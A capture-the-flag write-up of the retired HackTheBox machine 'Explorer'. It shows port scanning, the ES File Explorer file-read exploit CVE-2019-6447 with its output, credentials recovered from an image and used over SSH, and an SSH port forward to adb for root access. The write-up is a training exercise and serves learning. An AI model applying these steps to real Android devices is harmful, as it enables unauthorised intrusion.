HTB: Exlore

Explore card

This is a writeup about a retired HacktheBox machine: Explorer created by bertolis and publish on June 26, 2021. This box is classified as an easy machine. The user part involves an Android exploit for ES File Explorer and the root part a simple port forward and an adb shell.



We start with an nmap scan. Only ports 22 (SSH) and 8080 (HTTP) are open.

# Nmap 7.91 scan initiated Sat Jul 10 02:07:06 2021 as: nmap -sSV -A -p- -oN
Nmap scan report for
Host is up (0.012s latency).
Not shown: 65530 closed ports
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
33427/tcp open     unknown
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

The nmap scan hint us that the "box" is an Android device (port 5555 for adb, Banana ssh server and ES File Explorer).

A quick google search "ES File Explorer exploit" allows us to find an arbitrary file read exploit.

We run it and are able to list the files on the Android phone but nothing there will give us a shell (we are still abe to get the user flag). We list the pictures and found the creds.png file.

└─$ python3 listPics

|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

The file is a picture of (beautifully) handwritten credential: kristi:Kr1sT!5h@Rp3xPl0r3!

We can use this credentials to connect using SSH and get the user flag.

└─$ ssh kristi@ -p2222 #Kr1sT!5h@Rp3xPl0r3!
Password authentication
Password authentication
Password authentication
kristi@'s password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $ cat /sdcard/user.txt


We saw in out initial port scan that the port 5555 (adb) was filtered. We use SSH to access the port directly from the device by creating an SSH Local forward tunnel.

└─$ ssh -L 5557: kristi@ -p2222
Password authentication
:/ $ id

In another terminal we can run adb to list the device, connect to the box, run a shell as root and grab the flag.

└─$ adb devices
List of devices attached  device
└─$ adb connect
already connected to
└─$ adb -s shell                                                                                                                                                                                                          1 ⨯
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # find / -name 'root.txt' 2> /dev/null
1|:/ # cat data/root.txt

Wrapping up

A "quick" and easy box. I spent way to much time on the root part as my adb demon was acting weirdly and I thought the issue was on my port forwarding.